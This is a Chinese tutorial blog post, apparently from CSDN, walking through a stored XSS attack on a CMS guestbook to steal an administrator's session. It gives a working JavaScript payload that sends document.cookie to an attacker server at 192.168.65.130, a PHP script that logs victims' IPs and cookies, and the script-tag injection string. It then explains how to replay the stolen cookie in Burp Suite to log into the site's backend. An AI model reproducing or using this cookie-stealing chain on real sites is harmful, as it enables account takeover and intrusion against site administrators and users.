XSS注入实例-CMS

CMS

1.寻找目标网站的 xss 攻击点

留言板

论坛发帖页面

(逢框就插)

2.制作并搭建接收远程 Cookie 的服务器(kali)

打开kali的web服务
在这里插入图片描述

制作一个 JS 文件

cd /var/www/html
vi xss.js
var img=document.createElement('img');
img.width = 0;
img.height = 0;
img.src = 'http://192.168.65.130/xss.php?c='+document.cookie;


:wq

进入根目录 /var/www/html

制作一个 PHP 文件

vi xss.php
<?php
$ip = $_SERVER["REMOTE_ADDR"];
$cookie = $_GET["c"];
$fp="var/www/html/xss.txt";
$file = fopen($fp,"a+");
fwrite($file,$ip."\n");
fwrite($file,$cookie."\n");
fclose($file);
?>


:wq

在这里插入图片描述

给文件和目录执行权限

chmod 777 xss.js
...
或者
cd ..
chmod -R 777 html

在这里插入图片描述

3.确认攻击点

在输入区域提交XSS攻击脚本

<script>alert("xss")</script>

在这里插入图片描述

如脚本能够执行,有弹窗,则存在攻击点

某些网站发布的留言不会立即在前端显示,需要管理员审核,此时无法获知是否存在攻击点

在这里插入图片描述

当管理员点开留言时
在这里插入图片描述

4.提交盗取管理员 Cookie 的攻击代码

在输入框提交攻击代码

<script language=javascript src=http://192.168.65.130/xss.js></script>

在这里插入图片描述

5.等待管理员登录并查看留言

待管理员登录查看留言以后,盗取cookie
在这里插入图片描述

leafpad xss.txt
没有下载下载即可

在这里插入图片描述

6.使用接收到的管理员 Cookie 绕过身份验证直接登录网站后台

在主界面点击用户登录使用burpsuite进行抓包替换cookie
在这里插入图片描述
成功进入后台
在这里插入图片描述

直接匹配规则:
进入Match and replace rules
点击add
输入:
^Cookie.*$
Cookie: 值
勾上regex match
  • 16
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值